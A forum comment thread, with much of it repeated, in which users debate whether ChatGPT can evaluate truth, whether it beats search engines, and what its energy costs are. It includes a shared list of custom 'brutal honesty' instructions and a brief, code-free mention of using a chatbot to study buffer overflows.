I’m not saying these prompts won’t help, they probably will. But the notion that ChatGPT has any concept of “truth” is misleading. ChatGPT is a statistical language machine.
It cannot evaluate truth. Period.
What makes you think humans are better at evaluating truth? Most people can’t even define what they mean by “truth,” let alone apply epistemic rigor. ChatGPT is more consistent, less biased, and applies reasoning patterns that outperform the average human by miles.
Epistemology isn’t some mystical art, it’s a structured method for assessing belief and justification, and large models approximate it surprisingly well. Sure it doesn’t “understand” truth in the human sense, but it does evaluate claims against internalized patterns of logic, evidence, and coherence based on a massive corpus of human discourse. That’s more than most people manage in a Facebook argument.
So yes, it can evaluate truth. Not perfectly, but often better than the average person.
I prefer reading. Wikipedia is great. Duck duck go still gives pretty good results with the AI off. YouTube is filled with tutorials too. Cook books pre-AI are plentiful. There’s these things called newspapers that exist, they aren’t like they used to be but there is a choice of which to buy even.
I’ve no idea what a chatbot could help me with. And I think anybody who does need some help on things, could go learn about whatever they need in pretty short order if they wanted. And do a better job.
I still use Ecosia.org for most of my research on the Internet. It doesn’t need as much resources to fetch information as an AI bot would, plus it helps plant trees around the globe. Seems like a great deal to me.
People always forget about the energy it takes. 10 years ago we were shocked about the energy a Google factory needs to run; now imagine that orders of magnitude larger, and for what?
You search for topics and keywords on search engines. It’s a different skill. And from what I see, yields better results. If something is vague also, think quickly first and make it less vague. That goes for life!
And a tool which regurgitates rubbish in a verbose manner isn’t a tool. It’s a toy. Toy’s can spark your curiosity, but you don’t rely on them. Toy’s look pretty, and can teach you things. The lesson is that they aren’t a replacement for anything but lorem ipsum
Buddy that’s great if you know the topic or keyword to search for, if you don’t and only have a vague query that you’re trying to find more about to learn some keywords or topics to search for, you can use AI.
You can grandstand about tools vs toys and what ever other Luddite shit you want, at the end of the day despite all your raging you are the only one going to miss out despite whatever you fanatically tell yourself.
Sure an hour ago I had watched a video about smaller scales and physics below planck length. And I was curious, if we can classify smaller scales into conceptual groups, where they interact with physics in their own different ways, what would the opposite end of the spectrum be. From there I was able to ‘chat’ with an AI and discover and search wikipedia for terms such as Cosmological horizon, brane cosmology, etc.
In the end there was only theories on higher observable magnitudes, but it was a fun rabbit hole I could not have explored through traditional search engines - especially not the gimped product driven adsense shit we have today.
Remember how people used to say you can’t use Wikipedia, it’s unreliable. We would roll our eyes and say “yeah but we scroll down to the references and use it to find source material”? Same with LLM’s, you sort through it and get the information you need to get the information you need.
Actually, given the aforementioned prompts, its quite good at discerning flaws in my arguments and logical contradictions.
I’ve also trained its memory not to make assumptions when it comes to contentious topics, and to always source reputable articles and link them to replies.
People you’re replying to need to stop with the “gippity is bad” nonsense, it’s actually a fucking miracle of technology. You can criticize the carbon footprint of the corpos and the for-profit nature of the endeavour that was ultimately created through taxpayer-funded research at public institutions without shooting yourself in the foot by claiming what is very evidently not true.
In fact, if you haven’t found a use for a gippity type chatbot thing, it speaks a lot more about you and the fact you probably don’t do anything that complicated in your life where this would give you genuine value.
The article in OP also demonstrates how it could be used by the deranged/unintelligent for bad as well, so maybe it’s like a dunning-kruger curve.
Granted, it is flakey unless you’ve configured it not to be a shit cunt. Before I manually set these prompts and memory references, it talked shit all the time.
I have yet to see people using chatbots for anything actually & everyday useful. You can search anything with a “normal” search engine, phrase your searches as questions (or “prompts”), and get better answers that aren’t smarmy.
Also think of the orders of magnitude more energy ai sucks, compared to web search.
I use it to troubleshoot my own code when I’m dealing with something obscure and I’m at my wits end. There’s a good chance it will also spit out complete nonsense like calling functions with parameters that don’t exist etc., but it can also sometimes make halfway decent suggestions that you just won’t find on a modern search engine in any reasonable amount of time or that I would have never guessed to even look for due to assumptions made in the docs of a library or some such.
It’s also helpful to explain complex concepts by creating examples you want, for instance I was studying basic buffer overflows and wanted to see how I should expect a stack to look like in GDB’s examine memory view for a correct ROPchain to accomplish what I was trying to do, something no tutorial ever bothered to do, and gippity generated it correctly same as I had it at the time, and even suggested something that in the end made it actually work correctly (it was putting a ret gadget to get rid of any garbage in the stack frame directly after the overflow).
It was also much much faster than watching some greedy time vampire fuck spout off on YouTube in between the sponsorblock skipping his reminders to subscribe and whatnot.
Maybe not an everyday thing, but it’s basically an everyday thing for me, so I tend to use it everyday. Being a l33t haxx0r IT analyst schmuck often means I have to both be a generalist and a specialist in every tiny little thing across IT, while studying it there’s nothing better than a machine that’s able to decompress knowledge from it’s dataset quickly in the shape that is most well suited to my brain rather than have to filter so much useless info and outright misinformation from random medium articles and stack overflow posts. Gippity could be wrong too of course, but it’s just way less to parse, and the odds are definitely in its favour.
YouTube tutorials for the most part are garbage and a waste of your time, they are created for engagement and milking your money only, the edutainment side of YT ala Vsauce (pls come back) works as a general trivia to ensure a well-rounded worldview but it’s not gonna make you an expert on any subject. You’re on the right track with reading, but let’s be real you’re not gonna have much luck learning anything of value in brainrot that is newspapers and such, beyond cooking or w/e and who cares about that, I’d rather they teach me how I can never have to eat again because boy that shit takes up so much time.
For the most part, I agree. But YouTube is full of gold too. Lots of amateurs making content for themselves. And plenty of newspapers are high quality and worth your time to understand the current environment in which we operate. Don’t let them be your only source of news though, social media and newspapers are both guilty of creating information bubbles. Expand, be open, don’t be tribal.
This is the reason I’ve deliberately customized GPT with the follow prompts:
User expects correction if words or phrases are used incorrectly.
Tell it straight—no sugar-coating.
Stay skeptical and question things.
Keep a forward-thinking mindset.
User values deep, rational argumentation.
Ensure reasoning is solid and well-supported.
User expects brutal honesty.
Challenge weak or harmful ideas directly, no holds barred.
User prefers directness.
Point out flaws and errors immediately, without hesitation.
User appreciates when assumptions are challenged.
If something lacks support, dig deeper and challenge it.
I suggest copying these prompts into your own settings if you use GPT or other glorified chatbots.
I’m not saying these prompts won’t help, they probably will. But the notion that ChatGPT has any concept of “truth” is misleading. ChatGPT is a statistical language machine. It cannot evaluate truth. Period.
What makes you think humans are better at evaluating truth? Most people can’t even define what they mean by “truth,” let alone apply epistemic rigor. ChatGPT is more consistent, less biased, and applies reasoning patterns that outperform the average human by miles.
Epistemology isn’t some mystical art, it’s a structured method for assessing belief and justification, and large models approximate it surprisingly well. Sure it doesn’t “understand” truth in the human sense, but it does evaluate claims against internalized patterns of logic, evidence, and coherence based on a massive corpus of human discourse. That’s more than most people manage in a Facebook argument.
So yes, it can evaluate truth. Not perfectly, but often better than the average person.
I prefer reading. Wikipedia is great. Duck duck go still gives pretty good results with the AI off. YouTube is filled with tutorials too. Cook books pre-AI are plentiful. There’s these things called newspapers that exist, they aren’t like they used to be but there is a choice of which to buy even.
I’ve no idea what a chatbot could help me with. And I think anybody who does need some help on things, could go learn about whatever they need in pretty short order if they wanted. And do a better job.
I still use Ecosia.org for most of my research on the Internet. It doesn’t need as much resources to fetch information as an AI bot would, plus it helps plant trees around the globe. Seems like a great deal to me.
People always forget about the energy it takes. 10 years ago we were shocked about the energy a Google factory needs to run; now imagine that orders of magnitude larger, and for what?
Well one benefit is finding out what to read. I can ask for the name of a topic I’m describing and go off and research it on my own.
Search engines aren’t great with vague questions.
There’s this thing called using a wide variety of tools to one’s benefit; You should go learn about it.
You search for topics and keywords on search engines. It’s a different skill. And from what I see, yields better results. If something is vague also, think quickly first and make it less vague. That goes for life!
And a tool which regurgitates rubbish in a verbose manner isn’t a tool. It’s a toy. Toy’s can spark your curiosity, but you don’t rely on them. Toy’s look pretty, and can teach you things. The lesson is that they aren’t a replacement for anything but lorem ipsum
Buddy that’s great if you know the topic or keyword to search for, if you don’t and only have a vague query that you’re trying to find more about to learn some keywords or topics to search for, you can use AI.
You can grandstand about tools vs toys and what ever other Luddite shit you want, at the end of the day despite all your raging you are the only one going to miss out despite whatever you fanatically tell yourself.
I’m still sceptical, any chance you could share some prompts which illustrate this concept?
Sure an hour ago I had watched a video about smaller scales and physics below planck length. And I was curious, if we can classify smaller scales into conceptual groups, where they interact with physics in their own different ways, what would the opposite end of the spectrum be. From there I was able to ‘chat’ with an AI and discover and search wikipedia for terms such as Cosmological horizon, brane cosmology, etc.
In the end there was only theories on higher observable magnitudes, but it was a fun rabbit hole I could not have explored through traditional search engines - especially not the gimped product driven adsense shit we have today.
Remember how people used to say you can’t use Wikipedia, it’s unreliable. We would roll our eyes and say “yeah but we scroll down to the references and use it to find source material”? Same with LLM’s, you sort through it and get the information you need to get the information you need.
Wikipedia isn’t to be referenced for scientific papers, I’m sure we all agree there. But it does do almost exactly what you described. https://en.m.wikipedia.org/wiki/Shape_of_the_universe has some great further reading links. https://en.m.wikipedia.org/wiki/Cosmology has some great reads too. And for the time short: https://simple.m.wikipedia.org/wiki/Cosmology which also has Related Pages
I’m still yet to see how AI beats a search engine. And your example hasn’t convinced me either
If you still can’t see how natural language search is useful, that’s fine. We can, and we’re happy to keep using it.
I often use it to check whether my rationale is correct, or if my opinions are valid.
You do know it can’t reason and literally makes shit up approximately 50% of the time? Be quicker to toss a coin!
Actually, given the aforementioned prompts, its quite good at discerning flaws in my arguments and logical contradictions.
I’ve also trained its memory not to make assumptions when it comes to contentious topics, and to always source reputable articles and link them to replies.
Yeah this is my experience as well.
People you’re replying to need to stop with the “gippity is bad” nonsense, it’s actually a fucking miracle of technology. You can criticize the carbon footprint of the corpos and the for-profit nature of the endeavour that was ultimately created through taxpayer-funded research at public institutions without shooting yourself in the foot by claiming what is very evidently not true.
In fact, if you haven’t found a use for a gippity type chatbot thing, it speaks a lot more about you and the fact you probably don’t do anything that complicated in your life where this would give you genuine value.
The article in OP also demonstrates how it could be used by the deranged/unintelligent for bad as well, so maybe it’s like a dunning-kruger curve.
God that’s arrogant.
I know, and that’s fair. But am I wrong? That’s what matters more than anything else.
I make a lot of bold statements on this account, but I never do so lightly or unthinkingly.
Granted, it is flakey unless you’ve configured it not to be a shit cunt. Before I manually set these prompts and memory references, it talked shit all the time.
Given your prompts, maybe you are good at discerning flaws and analysing your own arguments too
I’m good enough at noticing my own flaws, as not to be arrogant enough to believe I’m immune from making mistakes :p
💯
I have yet to see people using chatbots for anything actually & everyday useful. You can search anything with a “normal” search engine, phrase your searches as questions (or “prompts”), and get better answers that aren’t smarmy.
Also think of the orders of magnitude more energy ai sucks, compared to web search.
Okay, challenge accepted.
I use it to troubleshoot my own code when I’m dealing with something obscure and I’m at my wits end. There’s a good chance it will also spit out complete nonsense like calling functions with parameters that don’t exist etc., but it can also sometimes make halfway decent suggestions that you just won’t find on a modern search engine in any reasonable amount of time or that I would have never guessed to even look for due to assumptions made in the docs of a library or some such.
It’s also helpful to explain complex concepts by creating examples you want, for instance I was studying basic buffer overflows and wanted to see how I should expect a stack to look like in GDB’s examine memory view for a correct ROPchain to accomplish what I was trying to do, something no tutorial ever bothered to do, and gippity generated it correctly same as I had it at the time, and even suggested something that in the end made it actually work correctly (it was putting a ret gadget to get rid of any garbage in the stack frame directly after the overflow).
It was also much much faster than watching some greedy time vampire fuck spout off on YouTube in between the sponsorblock skipping his reminders to subscribe and whatnot.
Maybe not an everyday thing, but it’s basically an everyday thing for me, so I tend to use it everyday. Being a l33t haxx0r IT analyst schmuck often means I have to both be a generalist and a specialist in every tiny little thing across IT, while studying it there’s nothing better than a machine that’s able to decompress knowledge from it’s dataset quickly in the shape that is most well suited to my brain rather than have to filter so much useless info and outright misinformation from random medium articles and stack overflow posts. Gippity could be wrong too of course, but it’s just way less to parse, and the odds are definitely in its favour.
YouTube tutorials for the most part are garbage and a waste of your time, they are created for engagement and milking your money only, the edutainment side of YT ala Vsauce (pls come back) works as a general trivia to ensure a well-rounded worldview but it’s not gonna make you an expert on any subject. You’re on the right track with reading, but let’s be real you’re not gonna have much luck learning anything of value in brainrot that is newspapers and such, beyond cooking or w/e and who cares about that, I’d rather they teach me how I can never have to eat again because boy that shit takes up so much time.
For the most part, I agree. But YouTube is full of gold too. Lots of amateurs making content for themselves. And plenty of newspapers are high quality and worth your time to understand the current environment in which we operate. Don’t let them be your only source of news though, social media and newspapers are both guilty of creating information bubbles. Expand, be open, don’t be tribal.
Don’t use AI. Do your own thinking